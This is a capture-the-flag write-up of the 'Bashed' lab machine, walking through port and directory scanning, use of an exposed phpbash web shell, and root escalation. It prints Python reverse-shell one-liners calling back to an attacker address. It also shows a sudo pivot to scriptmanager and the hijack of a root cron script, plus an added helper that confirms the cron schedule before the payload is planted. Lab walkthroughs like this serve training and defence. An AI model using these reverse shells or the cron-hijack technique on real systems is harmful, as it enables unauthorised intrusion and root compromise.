Bashed Write-Up

Enumeration

NMAP

Using the lazy *-A* option (OS detection, version detection, default scripts and traceroute in one go) we discover a single open port, 80, running Apache 2.4.18 on Ubuntu.

# nmap -A 10.10.10.68                        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
...[snipped]
Let's see what this website is about.

Dirbuster report

Of course, running a directory bruteforce is the next logical thing to do. It reveals a bunch of directories and files that are interesting:

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------
http://10.10.10.68:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/
Dirs found with a 403 response:
/icons/
/icons/small/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php

The developer boasts on the site about a phpbash web shell he put on the platform, and DirBuster found it under /dev/. Let's see how we can use it to our advantage.

Burp Suite

I am going to try and see the contents of the file of interest.

Request

The file takes a cmd parameter in a POST request and runs it as a shell command on the server, as the web server user. Let's cat our first flag 🙂

POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;

Response

HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8

/home/arrexel
user.txt
2c281f31<redacted>

Let’s see how we can escalate our privileges and gain root.

Firstly, let's get a reverse shell. Start a listener on the attacking machine first (nc -lvnp 80 for the port used below), then:

  1. change ATTACKING-IP and the port to the listener's address and send the one-liner through phpbash as the cmd parameter:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Result: the listener receives the connection and we have a shell as www-data, the Apache user.

Let's upgrade our shell so that it is more usable:

  1. Spawn a proper TTY: python3 -c 'import pty;pty.spawn("/bin/bash")'
  2. Get access to terminal features such as clear: export TERM=xterm
  3. Background the shell with Ctrl+Z, then in the original (attacker) terminal type stty raw -echo; fg to get tab completion, arrow keys and a Ctrl+C that does not kill the shell

Privilege Escalation

  • Ran LinEnum.sh on the box, but nothing of interest came up.
  • Looked for SUID/SGID files.
  • Finally, checked what www-data may run through sudo and received the following output:
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

So www-data may run any command as user scriptmanager (and group scriptmanager) without a password, which is what NOPASSWD: ALL means.

$ sudo -u scriptmanager whoami
scriptmanager

To become user scriptmanager we type in:

sudo -u scriptmanager /bin/bash -i 

Let's enumerate further. What does this user own or have access to?

scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout

Apart from the usual dotfiles in its home directory, it owns /scripts/test.py, which is worth a look.

scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

It opens test.txt for writing and writes a string into it. Who owns test.txt?

scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ../
-rw-r--r--  1 scriptmanager scriptmanager  282 Apr  8 03:19 test.py
-rw-r--r--  1 root          root            12 Apr  8 03:03 test.txt

test.txt is owned by root and has a recent timestamp, so whatever rewrites it runs as root, even though test.py itself belongs to scriptmanager. Nobody is running test.py by hand, so the likely explanation is a root cron job that executes test.py, or everything in /scripts, on a schedule. Since scriptmanager owns test.py and can overwrite it, anything we put in it will run as root the next time the job fires (watching whether the timestamp on test.txt keeps changing confirms this before committing). Let's add sauce: a Python reverse shell

scriptmanager@bashed:/scripts$ cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",5555))  # change this to your listener
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
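Before overwriting test.py it is worth confirming that something really re-runs it on a schedule, and as a more privileged user, rather than assuming it. The following is an added example (my own code, not from the original write-up): it samples the modification time of test.txt, infers the period between rewrites, and checks that the script is writable by us while its output is owned by someone else. The paths are the ones from the listing above; the sampling interval and number of rounds are assumptions.

```python
"""Confirm the cron hypothesis before planting a payload.

Added example, not from the original write-up. Assumed paths: /scripts/test.py
(the script we can write) and /scripts/test.txt (the file the job rewrites).
"""
import os
import pwd
import time

SCRIPT = "/scripts/test.py"   # owned by scriptmanager, writable by us
OUTPUT = "/scripts/test.txt"  # rewritten by the job, owned by root


def sample_mtimes(path, rounds=7, interval=20):
    """Record (wall clock, st_mtime) pairs for `path` over rounds*interval seconds.
    Defaults are an assumption sized to catch a once-a-minute job."""
    samples = []
    for _ in range(rounds):
        samples.append((time.time(), os.stat(path).st_mtime))
        time.sleep(interval)
    return samples


def infer_period(samples):
    """Smallest gap between distinct observed mtimes, or None if the file never
    changed during sampling. A steady gap such as 60.0 points at a cron job."""
    mtimes = sorted({mtime for _, mtime in samples})
    if len(mtimes) < 2:
        return None
    return min(later - earlier for earlier, later in zip(mtimes, mtimes[1:]))


def owner_name(uid):
    """Resolve a uid to a name; fall back to the number if it has no passwd entry."""
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def assess(script, output, samples):
    """Usable cron-based escalation means: we can write the script, and the job
    that runs it writes its output as a different (more privileged) user."""
    output_uid = os.stat(output).st_uid
    return {
        "script_writable": os.access(script, os.W_OK),
        "output_owner": owner_name(output_uid),
        "output_owned_by_other_user": output_uid != os.geteuid(),
        "period_seconds": infer_period(samples),
    }


if __name__ == "__main__":
    result = assess(SCRIPT, OUTPUT, sample_mtimes(OUTPUT))
    for key, value in result.items():
        print(f"{key}: {value}")
    if (result["script_writable"] and result["output_owned_by_other_user"]
            and result["period_seconds"]):
        print("Writable script re-run by another user's job: plant the payload and wait one period.")
```

Run it as scriptmanager; if period_seconds comes back None after a couple of minutes, the job is not firing as often as assumed and overwriting test.py may be a one-shot that never gets executed.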

When the job next fires, the listener catches the connection and we get a root shell:

# nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
